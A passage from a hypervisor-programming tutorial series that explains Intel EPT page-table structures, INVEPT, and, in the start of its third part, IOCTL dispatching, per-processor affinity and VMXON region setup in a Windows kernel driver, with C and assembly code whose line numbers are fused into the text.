1234567891011121314151617// See Table 28-1. typedef union _EPT_PML4E { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 Reserved1 : 5; // bit 7:3 (Must be Zero) UINT64 Accessed : 1; // bit 8 UINT64 Ignored1 : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved2 : 4; // bit 51:N UINT64 Ignored3 : 12; // bit 63:52 }Fields;}EPT_PML4E, *PEPT_PML4E;

As long as we want to have a 4-level paging, the second table is EPT Page-Directory-Pointer-Table (PDTP), the following picture illustrates the format of PDPTE :


PDPTE’s structure is like this :

1234567891011121314151617// See Table 28-3typedef union _EPT_PDPTE { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 Reserved1 : 5; // bit 7:3 (Must be Zero) UINT64 Accessed : 1; // bit 8 UINT64 Ignored1 : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved2 : 4; // bit 51:N UINT64 Ignored3 : 12; // bit 63:52 }Fields;}EPT_PDPTE, *PEPT_PDPTE;

For the third table of paging we should implement an EPT Page-Directory Entry (PDE) as described below:


PDE’s structure:

1234567891011121314151617// See Table 28-5typedef union _EPT_PDE { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 Reserved1 : 5; // bit 7:3 (Must be Zero) UINT64 Accessed : 1; // bit 8 UINT64 Ignored1 : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved2 : 4; // bit 51:N UINT64 Ignored3 : 12; // bit 63:52 }Fields;}EPT_PDE, *PEPT_PDE;

The last page is EPT which is described below.


PTE will be :

Note that you have, EPTMemoryType, IgnorePAT, DirtyFlag and SuppressVE in addition to the above pages.

1234567891011121314151617181920// See Table 28-6typedef union _EPT_PTE { ULONG64 All; struct { UINT64 Read : 1; // bit 0 UINT64 Write : 1; // bit 1 UINT64 Execute : 1; // bit 2 UINT64 EPTMemoryType : 3; // bit 5:3 (EPT Memory type) UINT64 IgnorePAT : 1; // bit 6 UINT64 Ignored1 : 1; // bit 7 UINT64 AccessedFlag : 1; // bit 8 UINT64 DirtyFlag : 1; // bit 9 UINT64 ExecuteForUserMode : 1; // bit 10 UINT64 Ignored2 : 1; // bit 11 UINT64 PhysicalAddress : 36; // bit (N-1):12 or Page-Frame-Number UINT64 Reserved : 4; // bit 51:N UINT64 Ignored3 : 11; // bit 62:52 UINT64 SuppressVE : 1; // bit 63 }Fields;}EPT_PTE, *PEPT_PTE;

There are other types of implementing page walks ( 2 or 3 level paging) and if you set the 7th bit of PDPTE (Maps 1 GB) or the 7th bit of PDE (Maps 2 MB) so instead of implementing 4 level paging (like what we want to do for the rest of the topic) you set those bits but keep in mind that the corresponding tables are different. These tables described in (Table 28-4. Format of an EPT Page-Directory Entry (PDE) that Maps a 2-MByte Page) and (Table 28-2. Format of an EPT Page-Directory-Pointer-Table Entry (PDPTE) that Maps a 1-GByte Page). Alex Ionescu’s SimpleVisor is an example of implementing in this way.

An important note is almost all the above structures have a 36-bit Physical Address which means our hypervisor supports only 4-level paging. It is because every page table (and every EPT Page Table) consist of 512 entries which means you need 9 bits to select an entry and as long as we have 4 level tables, we can’t use more than 36 (4 * 9) bits. Another method with wider address range is not implemented in all major OS like Windows or Linux. I’ll describe EPT PML5E briefly later in this topic but we don’t implement it in our hypervisor as it’s not popular yet!

By the way, N is the physical-address width supported by the processor. CPUID with 80000008H in EAX gives you the supported width in EAX bits 7:0.

Let’s see the rest of the code, the following code is the Initialize_EPTP function which is responsible for allocating and mapping EPTP.

Note that the PAGED_CODE() macro ensures that the calling thread is running at an IRQL that is low enough to permit paging.

1234UINT64 Initialize_EPTP(){ PAGED_CODE();        …

First of all, allocating EPTP and put zeros on it.

1234567 // Allocate EPTP PEPTP EPTPointer = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG);  if (!EPTPointer) { return NULL; } RtlZeroMemory(EPTPointer, PAGE_SIZE);

Now, we need a blank page for our EPT PML4 Table.

1234567 // Allocate EPT PML4 PEPT_PML4E EPT_PML4 = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG); if (!EPT_PML4) { ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PML4, PAGE_SIZE);

And another empty page for PDPT.

12345678// Allocate EPT Page-Directory-Pointer-Table PEPT_PDPTE EPT_PDPT = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG); if (!EPT_PDPT) { ExFreePoolWithTag(EPT_PML4, POOLTAG); ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PDPT, PAGE_SIZE);

Of course its true about Page Directory Table.

12345678910 // Allocate EPT Page-Directory PEPT_PDE EPT_PD = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG);  if (!EPT_PD) { ExFreePoolWithTag(EPT_PDPT, POOLTAG); ExFreePoolWithTag(EPT_PML4, POOLTAG); ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PD, PAGE_SIZE);

The last table is a blank page for EPT Page Table.

1234567891011 // Allocate EPT Page-Table PEPT_PTE EPT_PT = ExAllocatePoolWithTag(NonPagedPool, PAGE_SIZE, POOLTAG);  if (!EPT_PT) { ExFreePoolWithTag(EPT_PD, POOLTAG); ExFreePoolWithTag(EPT_PDPT, POOLTAG); ExFreePoolWithTag(EPT_PML4, POOLTAG); ExFreePoolWithTag(EPTPointer, POOLTAG); return NULL; } RtlZeroMemory(EPT_PT, PAGE_SIZE);

Now that we have all of our pages available, let’s allocate two page (2*4096) continuously because we need one of the pages for our RIP to start and one page for our Stack (RSP). After that, we need two EPT Page Table Entries (PTEs) with permission to executereadwrite. The physical address should be divided by 4096 (PAGE_SIZE) because if we dived a hex number by 4096 (0x1000) 12 digits from the right (which are zeros) will disappear and these 12 digits are for choosing between 4096 bytes.

By the way, we let stack be executable too and that’s because, in a regular VM, we should put RWX to all pages because its the responsibility of internal page tables to set or clear NX bit. We need to change them from EPT Tables for special purposes (e.g intercepting instruction fetch for a special page). Changing from EPT tables will lead to EPT-Violation, in this way we can intercept these events.

The actual need is two page but we need to build page tables inside our guest software thus we allocate up to 10 page.

I’ll explain about intercepting pages from EPT, later in these series.

123456789101112131415161718192021 // Setup PT by allocating two pages Continuously // We allocate two pages because we need 1 page for our RIP to start and 1 page for RSP 1 + 1 and other paages for paging  const int PagesToAllocate = 10; UINT64 Guest_Memory = ExAllocatePoolWithTag(NonPagedPool, PagesToAllocate * PAGE_SIZE, POOLTAG); RtlZeroMemory(Guest_Memory, PagesToAllocate * PAGE_SIZE);  for (size_t i = 0; i < PagesToAllocate; i++) { EPT_PT[i].Fields.AccessedFlag = 0; EPT_PT[i].Fields.DirtyFlag = 0; EPT_PT[i].Fields.EPTMemoryType = 6; EPT_PT[i].Fields.Execute = 1; EPT_PT[i].Fields.ExecuteForUserMode = 0; EPT_PT[i].Fields.IgnorePAT = 0; EPT_PT[i].Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress( Guest_Memory + ( i * PAGE_SIZE ))/ PAGE_SIZE ); EPT_PT[i].Fields.Read = 1; EPT_PT[i].Fields.SuppressVE = 0; EPT_PT[i].Fields.Write = 1;  }

Note: EPTMemoryType can be either 0 (for uncached memory) or 6 (write-back) memory and as we want our memory to be cacheable so put 6 on it.

The next table is PDE. PDE should point to PTE base address so we just put the address of the first entry from the EPT PTE as the physical address for Page Directory Entry.

123456789101112// Setting up PDE EPT_PD->Fields.Accessed = 0; EPT_PD->Fields.Execute = 1; EPT_PD->Fields.ExecuteForUserMode = 0; EPT_PD->Fields.Ignored1 = 0; EPT_PD->Fields.Ignored2 = 0; EPT_PD->Fields.Ignored3 = 0; EPT_PD->Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress(EPT_PT) / PAGE_SIZE); EPT_PD->Fields.Read = 1; EPT_PD->Fields.Reserved1 = 0; EPT_PD->Fields.Reserved2 = 0; EPT_PD->Fields.Write = 1;

Next step is mapping PDPT. PDPT Entry should point to the first entry of Page-Directory.

123456789101112 // Setting up PDPTE EPT_PDPT->Fields.Accessed = 0; EPT_PDPT->Fields.Execute = 1; EPT_PDPT->Fields.ExecuteForUserMode = 0; EPT_PDPT->Fields.Ignored1 = 0; EPT_PDPT->Fields.Ignored2 = 0; EPT_PDPT->Fields.Ignored3 = 0; EPT_PDPT->Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress(EPT_PD) / PAGE_SIZE); EPT_PDPT->Fields.Read = 1; EPT_PDPT->Fields.Reserved1 = 0; EPT_PDPT->Fields.Reserved2 = 0; EPT_PDPT->Fields.Write = 1;

The last step is configuring PML4E which points to the first entry of the PTPT.

123456789101112 // Setting up PML4E EPT_PML4->Fields.Accessed = 0; EPT_PML4->Fields.Execute = 1; EPT_PML4->Fields.ExecuteForUserMode = 0; EPT_PML4->Fields.Ignored1 = 0; EPT_PML4->Fields.Ignored2 = 0; EPT_PML4->Fields.Ignored3 = 0; EPT_PML4->Fields.PhysicalAddress = (VirtualAddress_to_PhysicalAddress(EPT_PDPT) / PAGE_SIZE); EPT_PML4->Fields.Read = 1; EPT_PML4->Fields.Reserved1 = 0; EPT_PML4->Fields.Reserved2 = 0; EPT_PML4->Fields.Write = 1;

We’ve almost done! Just set up the EPTP for our VMCS by putting 0x6 as the memory type (which is write-back) and we walk 4 times so the page walk length is 4-1=3 and PML4 address is the physical address of the first entry in the PML4 table.

I’ll explain about DirtyAndAcessEnabled field later in this topic.

1234567 // Setting up EPTP EPTPointer->Fields.DirtyAndAceessEnabled = 1; EPTPointer->Fields.MemoryType = 6; // 6 = Write-back (WB) EPTPointer->Fields.PageWalkLength = 3;  // 4 (tables walked) — 1 = 3 EPTPointer->Fields.PML4Address = (VirtualAddress_to_PhysicalAddress(EPT_PML4) / PAGE_SIZE); EPTPointer->Fields.Reserved1 = 0; EPTPointer->Fields.Reserved2 = 0;

and the last step.

12 DbgPrint(«[*] Extended Page Table Pointer allocated at %llx»,EPTPointer); return EPTPointer;

All the above page tables should be aligned to 4KByte boundaries but as long as we allocate >= PAGE_SIZE (One PFN record) so it’s automatically 4kb-aligned.

Our implementation consist of 4 tables, therefore, the full layout is like this:

EPT Layout

Accessed and Dirty Flags in EPTP

In EPTP, you’ll decide whether enable accessed and dirty flags for EPT or not using the 6th bit of the extended-page-table pointer (EPTP). Setting this flag causes processor accesses to guest paging structure entries to be treated as writes.

For any EPT paging-structure entry that is used during guest-physical-address translation, bit 8 is the accessed flag. For an EPT paging-structure entry that maps a page (as opposed to referencing another EPT paging structure), bit 9 is the dirty flag.

Whenever the processor uses an EPT paging-structure entry as part of the guest-physical-address translation, it sets the accessed flag in that entry (if it is not already set).

Whenever there is a write to a guest-physical address, the processor sets the dirty flag (if it is not already set) in the EPT paging-structure entry that identifies the final physical address for the guest-physical address (either an EPT PTE or an EPT paging-structure entry in which bit 7 is 1).

These flags are “sticky,” meaning that, once set, the processor does not clear them; only software can clear them.

5-Level EPT Translation

Intel suggests a new table in translation hierarchy, called PML5 which extends the EPT into a 5-layer table and guest operating systems can use up to 57 bit for the virtual-addresses while the classic 4-level EPT is limited to translating 48-bit guest-physical
addresses. None of the modern OSs use this feature yet.

PML5 is also applying to both EPT and regular paging mechanism.

Translation begins by identifying a 4-KByte naturally aligned EPT PML5 table. It is located at the physical address specified in bits 51:12 of EPTP. An EPT PML5 table comprises 512 64-bit entries (EPT PML5Es). An EPT PML5E is selected using the physical address defined as follows.

  • Bits 63:52 are all 0.
  • Bits 51:12 are from EPTP.
  • Bits 11:3 are bits 56:48 of the guest-physical address.
  • Bits 2:0 are all 0.
  • Because an EPT PML5E is identified using bits 56:48 of the guest-physical address, it controls access to a 256-TByte region of the linear address space.

The only difference is you should put PML5 physical address instead of the PML4 address in EPTP.

For more information about 5-layer paging take a look at this Intel documentation.

Invalidating Cache (INVEPT)

Well, Intel’s explanation about Cache invalidating is really vague and I couldn’t understand it completely but I asked Petr and he explains me in this way:

  • VMX-specific TLB-management instructions:
    • INVEPT – Invalidate cached Extended Page Table (EPT) mappings in the processor to synchronize address translation in virtual machines with memory-resident EPT pages.
    • INVVPID – Invalidate cached mappings of address translation based on the Virtual Processor ID (VPID).

Imagine we access guest-physical-address 0x1000,it’ll get translated to host-physical-address 0x5000. Next time, if we access 0x1000, the CPU won’t send the request to the memory bus but uses cached memory instead. it’s faster. Now let’s say we change EPT_PDPT->PhysicalAddress to point to different EPT PD or change the attributes of one of the EPT tables, now we have to tell the processor that your cache is invalid and that’s what exactly INVEPT performs.

Now we have two terms here, Single-Context and All-Context.

Single-Context means, that you invalidate all EPT-derived translations based on a single EPTP (in short: for single VM).

All-Context means that you invalidate all EPT-derived translations. (for every-VM).

So in case if you wouldn’t perform INVEPT after changing EPT’s structures, you would be risking that the CPU would reuse old translations.

Basically, any change to EPT structure needs INVEPT but switching EPT (or VMCS) doesn’t need INVEPT because that translation will be “tagged” with the changed EPTP in the cache.

The following assembly function is responsible for INVEPT.

12345678910111213INVEPT_Instruction PROC PUBLIC        invept  rcx, oword ptr [rdx]        jz @jz        jc @jc        xor     rax, rax        ret @jz:    mov     rax, VMX_ERROR_CODE_FAILED_WITH_STATUS        ret @jc:    mov     rax, VMX_ERROR_CODE_FAILED        retINVEPT_Instruction ENDP


123    VMX_ERROR_CODE_SUCCESS              = 0    VMX_ERROR_CODE_FAILED_WITH_STATUS   = 1    VMX_ERROR_CODE_FAILED               = 2

Now, we implement INVEPT.

12345678910unsigned char INVEPT(UINT32 type, INVEPT_DESC* descriptor){ if (!descriptor) { static INVEPT_DESC zero_descriptor = { 0 }; descriptor = &zero_descriptor; }  return INVEPT_Instruction(type, descriptor);}

To invalidate all the contexts use the following function.

1234unsigned char INVEPT_ALL_CONTEXTS(){ return INVEPT(all_contexts ,NULL);}

And the last step is for Single-Context INVEPT which needs an EPTP.

12345unsigned char INVEPT_SINGLE_CONTEXT(EPTP ept_pointer){ INVEPT_DESC descriptor = { ept_pointer, 0 }; return INVEPT(single_context, &descriptor);}

Using the above functions in a modification state, tell the processor to invalidate its cache.


In this part, we see how to initialize the Extended Page Table and map guest physical address to host physical address then we build the EPTP based on the allocated addresses.

The future part would be about building the VMCS and implementing other VMX instructions. Don’t forget to check the blog for the future posts.

Have a good time!


[1] Vol 3C – 28.2 THE EXTENDED PAGE TABLE MECHANISM (EPT) (https://software.intel.com/en-us/articles/intel-sdm)

[2] Performance Evaluation of Intel EPT Hardware Assist (https://www.vmware.com/pdf/Perf_ESX_Intel-EPT-eval.pdf)

[3] Second Level Address Translation (https://en.wikipedia.org/wiki/Second_Level_Address_Translation)  

[4] Memory Virtualization (http://www.cs.nthu.edu.tw/~ychung/slides/Virtualization/VM-Lecture-2-2-SystemVirtualizationMemory.pptx)  [5] Best Practices for Paravirtualization Enhancements from Intel® Virtualization Technology: EPT and VT-d (https://software.intel.com/en-us/articles/best-practices-for-paravirtualization-enhancements-from-intel-virtualization-technology-ept-and-vt-d)[6] 5-Level Paging and 5-Level EPT (https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf) [7] Xen Summit November 2007 – Jun Nakajima (http://www-archive.xenproject.org/files/xensummit_fall07/12_JunNakajima.pdf) [8] gipervizor against rutkitov: as it works (http://developers-club.com/posts/133906/) [9] Intel SGX Explained (https://www.semanticscholar.org/paper/Intel-SGX-Explained-Costan-Devadas/2d7f3f4ca3fbb15ae04533456e5031e0d0dc845a) [10] Intel VT-x (https://github.com/tnballo/notebook/wiki/Intel-VTx) [11] Introduction to IA-32e hardware paging (https://www.triplefault.io/2017/07/introduction-to-ia-32e-hardware-paging.html)

Hypervisor From Scratch – Part 3: Setting up Our First Virtual Machine

( Original text by Sinaei )


This is the third part of the tutorial “Hypervisor From Scratch“. You may have noticed that the previous parts have steadily been getting more complicated. This part should teach you how to get started with creating your own VMM, we go to demonstrate how to interact with the VMM from Windows User-mode (IOCTL Dispatcher), then we solve the problems with the affinity and running code in a special core. Finally, we get familiar with initializing VMXON Regions and VMCS Regions then we load our hypervisor regions into each core and implement our custom functions to work with hypervisor instruction and many more things related to Virtual-Machine Control Data Structures (VMCS).

Some of the implementations derived from HyperBone (Minimalistic VT-X hypervisor with hooks) and HyperPlatform by Satoshi Tanda and hvpp which is great work by my friend Petr Beneš the person who really helped me creating these series.

The full source code of this tutorial is available on :


Interacting with VMM Driver from User-Mode

The most important function in IRP MJ functions for us is DrvIOCTLDispatcher (IRP_MJ_DEVICE_CONTROL) and that’s because this function can be called from user-mode with a special IOCTL number, it means you can have a special code in your driver and implement a special functionality corresponding this code, then by knowing the code (from user-mode) you can ask your driver to perform your request, so you can imagine that how useful this function would be.

Now let’s implement our functions for dispatching IOCTL code and print it from our kernel-mode driver.

As long as I know, there are several methods by which you can dispatch IOCTL e.g METHOD_BUFFERED, METHOD_NIETHER, METHOD_IN_DIRECT, METHOD_OUT_DIRECT. These methods should be followed by the user-mode caller (the difference are in the place where buffers transfer between user-mode and kernel-mode or vice versa), I just copy the implementations with some minor modification form Microsoft’s Windows Driver Samples, you can see the full code for user-mode and kernel-mode.

Imagine we have the following IOCTL codes:

12345678910111213141516171819//// Device type           — in the «User Defined» range.»//#define SIOCTL_TYPE 40000 //// The IOCTL function codes from 0x800 to 0xFFF are for customer use.//#define IOCTL_SIOCTL_METHOD_IN_DIRECT \    CTL_CODE( SIOCTL_TYPE, 0x900, METHOD_IN_DIRECT, FILE_ANY_ACCESS  ) #define IOCTL_SIOCTL_METHOD_OUT_DIRECT \    CTL_CODE( SIOCTL_TYPE, 0x901, METHOD_OUT_DIRECT , FILE_ANY_ACCESS  ) #define IOCTL_SIOCTL_METHOD_BUFFERED \    CTL_CODE( SIOCTL_TYPE, 0x902, METHOD_BUFFERED, FILE_ANY_ACCESS  ) #define IOCTL_SIOCTL_METHOD_NEITHER \    CTL_CODE( SIOCTL_TYPE, 0x903, METHOD_NEITHER , FILE_ANY_ACCESS  )

There is a convention for defining IOCTLs as it mentioned here,

The IOCTL is a 32-bit number. The first two low bits define the “transfer type” which can be METHOD_OUT_DIRECT, METHOD_IN_DIRECT, METHOD_BUFFERED or METHOD_NEITHER.

The next set of bits from 2 to 13 define the “Function Code”. The high bit is referred to as the “custom bit”. This is used to determine user-defined IOCTLs versus system defined. This means that function codes 0x800 and greater are customs defined similarly to how WM_USER works for Windows Messages.

The next two bits define the access required to issue the IOCTL. This is how the I/O Manager can reject IOCTL requests if the handle has not been opened with the correct access. The access types are such as FILE_READ_DATA and FILE_WRITE_DATA for example.

The last bits represent the device type the IOCTLs are written for. The high bit again represents user-defined values.

In IOCTL Dispatcher, The “Parameters.DeviceIoControl.IoControlCode” of the IO_STACK_LOCATIONcontains the IOCTL code being invoked.

For METHOD_IN_DIRECT and METHOD_OUT_DIRECT, the difference between IN and OUT is that with IN, you can use the output buffer to pass in data while the OUT is only used to return data.

The METHOD_BUFFERED is a buffer that the data is copied from this buffer. The buffer is created as the larger of the two sizes, the input or output buffer. Then the read buffer is copied to this new buffer. Before you return, you simply copy the return data into the same buffer. The return value is put into the IO_STATUS_BLOCK and the I/O Manager copies the data into the output buffer. The METHOD_NEITHERis the same.

Ok, let’s see an example :

First, we declare all our needed variable.

Note that the PAGED_CODE macro ensures that the calling thread is running at an IRQL that is low enough to permit paging.

123456789101112131415161718192021222324252627NTSTATUS DrvIOCTLDispatcher( PDEVICE_OBJECT DeviceObject, PIRP Irp){ PIO_STACK_LOCATION  irpSp;// Pointer to current stack location NTSTATUS            ntStatus = STATUS_SUCCESS;// Assume success ULONG               inBufLength; // Input buffer length ULONG               outBufLength; // Output buffer length PCHAR               inBuf, outBuf; // pointer to Input and output buffer PCHAR               data = «This String is from Device Driver !!!»; size_t              datalen = strlen(data) + 1;//Length of data including null PMDL                mdl = NULL; PCHAR               buffer = NULL;  UNREFERENCED_PARAMETER(DeviceObject);  PAGED_CODE();  irpSp = IoGetCurrentIrpStackLocation(Irp); inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength; outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;  if (!inBufLength || !outBufLength) { ntStatus = STATUS_INVALID_PARAMETER; goto End; } …

Then we have to use switch-case through the IOCTLs (Just copy buffers and show it from DbgPrint()).

123456789101112131415161718 switch (irpSp->Parameters.DeviceIoControl.IoControlCode) { case IOCTL_SIOCTL_METHOD_BUFFERED:  DbgPrint(«Called IOCTL_SIOCTL_METHOD_BUFFERED\n»); PrintIrpInfo(Irp); inBuf = Irp->AssociatedIrp.SystemBuffer; outBuf = Irp->AssociatedIrp.SystemBuffer; DbgPrint(«\tData from User :»); DbgPrint(inBuf); PrintChars(inBuf, inBufLength); RtlCopyBytes(outBuf, data, outBufLength); DbgPrint((«\tData to User : «)); PrintChars(outBuf, datalen); Irp->IoStatus.Information = (outBufLength < datalen ? outBufLength : datalen); break; …

The PrintIrpInfo is like this :

123456789101112131415161718VOID PrintIrpInfo(PIRP Irp){ PIO_STACK_LOCATION  irpSp; irpSp = IoGetCurrentIrpStackLocation(Irp);  PAGED_CODE();  DbgPrint(«\tIrp->AssociatedIrp.SystemBuffer = 0x%p\n», Irp->AssociatedIrp.SystemBuffer); DbgPrint(«\tIrp->UserBuffer = 0x%p\n», Irp->UserBuffer); DbgPrint(«\tirpSp->Parameters.DeviceIoControl.Type3InputBuffer = 0x%p\n», irpSp->Parameters.DeviceIoControl.Type3InputBuffer); DbgPrint(«\tirpSp->Parameters.DeviceIoControl.InputBufferLength = %d\n», irpSp->Parameters.DeviceIoControl.InputBufferLength); DbgPrint(«\tirpSp->Parameters.DeviceIoControl.OutputBufferLength = %d\n», irpSp->Parameters.DeviceIoControl.OutputBufferLength); return;}

Even though you can see all the implementations in my GitHub but that’s enough, in the rest of the post we only use the IOCTL_SIOCTL_METHOD_BUFFERED method.

Now from user-mode and if you remember from the previous part where we create a handle (HANDLE) using CreateFile, now we can use the DeviceIoControl to call DrvIOCTLDispatcher(IRP_MJ_DEVICE_CONTROL) along with our parameters from user-mode.

1234567891011121314151617181920212223242526272829 char OutputBuffer[1000]; char InputBuffer[1000]; ULONG bytesReturned; BOOL Result;  StringCbCopy(InputBuffer, sizeof(InputBuffer), «This String is from User Application; using METHOD_BUFFERED»);  printf(«\nCalling DeviceIoControl METHOD_BUFFERED:\n»);  memset(OutputBuffer, 0, sizeof(OutputBuffer));  Result = DeviceIoControl(handle, (DWORD)IOCTL_SIOCTL_METHOD_BUFFERED, &InputBuffer, (DWORD)strlen(InputBuffer) + 1, &OutputBuffer, sizeof(OutputBuffer), &bytesReturned, NULL );  if (!Result) { printf(«Error in DeviceIoControl : %d», GetLastError()); return 1;  } printf(»    OutBuffer (%d): %s\n», bytesReturned, OutputBuffer);

There is an old, yet great topic here which describes the different types of IOCT dispatching.

I think we’re done with WDK basics, its time to see how we can use Windows in order to build our VMM.

Per Processor Configuration and Setting Affinity

Affinity to a special logical processor is one of the main things that we should consider when working with the hypervisor.

Unfortunately, in Windows, there is nothing like on_each_cpu (like it is in Linux Kernel Module) so we have to change our affinity manually in order to run on each logical processor. In my Intel Core i7 6820HQ I have 4 physical cores and each core can run 2 threads simultaneously (due to the presence of hyper-threading) thus we have 8 logical processors and of course 8 sets of all the registers (including general purpose registers and MSR registers) so we should configure our VMM to work on 8 logical processors.

To get the count of logical processors you can use KeQueryActiveProcessors(), then we should pass a KAFFINITY mask to the KeSetSystemAffinityThread which sets the system affinity of the current thread.

KAFFINITY mask can be configured using a simple power function :

1234567891011121314151617int ipow(int base, int exp) { int result = 1; for (;;) { if ( exp & 1) { result *= base; } exp >>= 1; if (!exp) { break; } base *= base; } return result;}

then we should use the following code in order to change the affinity of the processor and run our code in all the logical cores separately:

12345678910 KAFFINITY kAffinityMask; for (size_t i = 0; i < KeQueryActiveProcessors(); i++) { kAffinityMask = ipow(2, i); KeSetSystemAffinityThread(kAffinityMask); DbgPrint(«=====================================================»); DbgPrint(«Current thread is executing in %d th logical processor.»,i); // Put you function here !  }

Conversion between the physical and virtual addresses

VMXON Regions and VMCS Regions (see below) use physical address as the operand to VMXON and VMPTRLD instruction so we should create functions to convert Virtual Address to Physical address:

1234UINT64 VirtualAddress_to_PhysicallAddress(void* va){ return MmGetPhysicalAddress(va).QuadPart;}

And as long as we can’t directly use physical addresses for our modifications in protected-mode then we have to convert physical address to virtual address.

1234567UINT64 PhysicalAddress_to_VirtualAddress(UINT64 pa){ PHYSICAL_ADDRESS PhysicalAddr; PhysicalAddr.QuadPart = pa;  return MmGetVirtualForPhysical(PhysicalAddr);}

Query about Hypervisor from the kernel

In the previous part, we query about the presence of hypervisor from user-mode, but we should consider checking about hypervisor from kernel-mode too. This reduces the possibility of getting kernel errors in the future or there might be something that disables the hypervisor using the lock bit, by the way, the following code checks IA32_FEATURE_CONTROL MSR (MSR address 3AH) to see if the lock bitis set or not.

123456789101112131415161718192021222324252627BOOLEAN Is_VMX_Supported(){ CPUID data = { 0 };  // VMX bit __cpuid((int*)&data, 1); if ((data.ecx & (1 << 5)) == 0) return FALSE;  IA32_FEATURE_CONTROL_MSR Control = { 0 }; Control.All = __readmsr(MSR_IA32_FEATURE_CONTROL);  // BIOS lock check if (Control.Fields.Lock == 0) { Control.Fields.Lock = TRUE; Control.Fields.EnableVmxon = TRUE; __writemsr(MSR_IA32_FEATURE_CONTROL, Control.All); } else if (Control.Fields.EnableVmxon == FALSE) { DbgPrint(«[*] VMX locked off in BIOS»); return FALSE; }  return TRUE;}

The structures used in the above function declared like this:

1234567891011121314151617181920212223typedef union _IA32_FEATURE_CONTROL_MSR{ ULONG64 All; struct { ULONG64 Lock : 1;                // [0] ULONG64 EnableSMX : 1;           // [1] ULONG64 EnableVmxon : 1;         // [2] ULONG64 Reserved2 : 5;           // [3-7] ULONG64 EnableLocalSENTER : 7;   // [8-14] ULONG64 EnableGlobalSENTER : 1;  // [15] ULONG64 Reserved3a : 16;         // ULONG64 Reserved3b : 32;         // [16-63] } Fields;} IA32_FEATURE_CONTROL_MSR, *PIA32_FEATURE_CONTROL_MSR; typedef struct _CPUID{ int eax; int ebx; int ecx; int edx;} CPUID, *PCPUID;

VMXON Region

Before executing VMXON, software should allocate a naturally aligned 4-KByte region of memory that a logical processor may use to support VMX operation. This region is called the VMXON region. The address of the VMXON region (the VMXON pointer) is provided in an operand to VMXON.

A VMM can (should) use different VMXON Regions for each logical processor otherwise the behavior is “undefined”.

Note: The first processors to support VMX operation require that the following bits be 1 in VMX operation: CR0.PE, CR0.NE, CR0.PG, and CR4.VMXE. The restrictions on CR0.PE and CR0.PG imply that VMX operation is supported only in paged protected mode (including IA-32e mode). Therefore, the guest software cannot be run in unpaged protected mode or in real-address mode. 

Now that we are configuring the hypervisor, we should have a global variable that describes the state of our virtual machine, I create the following structure for this purpose, currently, we just have two fields (VMXON_REGION and VMCS_REGION) but we will add new fields in this structure in the future parts.

12345typedef struct _VirtualMachineState{ UINT64 VMXON_REGION;                        // VMXON region UINT64 VMCS_REGION;                         // VMCS region} VirtualMachineState, *PVirtualMachineState;

And of course a global variable:

1extern PVirtualMachineState vmState;

I create the following function (in memory.c) to allocate VMXON Region and execute VMXON instruction using the allocated region’s pointer.

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162BOOLEAN Allocate_VMXON_Region(IN PVirtualMachineState vmState){ // at IRQL > DISPATCH_LEVEL memory allocation routines don’t work if (KeGetCurrentIrql() > DISPATCH_LEVEL) KeRaiseIrqlToDpcLevel();   PHYSICAL_ADDRESS PhysicalMax = { 0 }; PhysicalMax.QuadPart = MAXULONG64;   int VMXONSize = 2 * VMXON_SIZE; BYTE* Buffer = MmAllocateContiguousMemory(VMXONSize + ALIGNMENT_PAGE_SIZE, PhysicalMax);  // Allocating a 4-KByte Contigous Memory region  PHYSICAL_ADDRESS Highest = { 0 }, Lowest = { 0 }; Highest.QuadPart = ~0;  //BYTE* Buffer = MmAllocateContiguousMemorySpecifyCache(VMXONSize + ALIGNMENT_PAGE_SIZE, Lowest, Highest, Lowest, MmNonCached); if (Buffer == NULL) { DbgPrint(«[*] Error : Couldn’t Allocate Buffer for VMXON Region.»); return FALSE;// ntStatus = STATUS_INSUFFICIENT_RESOURCES; } UINT64 PhysicalBuffer = VirtualAddress_to_PhysicallAddress(Buffer);  // zero-out memory RtlSecureZeroMemory(Buffer, VMXONSize + ALIGNMENT_PAGE_SIZE); UINT64 alignedPhysicalBuffer = (BYTE*)((ULONG_PTR)(PhysicalBuffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  UINT64 alignedVirtualBuffer = (BYTE*)((ULONG_PTR)(Buffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  DbgPrint(«[*] Virtual allocated buffer for VMXON at %llx», Buffer); DbgPrint(«[*] Virtual aligned allocated buffer for VMXON at %llx», alignedVirtualBuffer); DbgPrint(«[*] Aligned physical buffer allocated for VMXON at %llx», alignedPhysicalBuffer);  // get IA32_VMX_BASIC_MSR RevisionId  IA32_VMX_BASIC_MSR 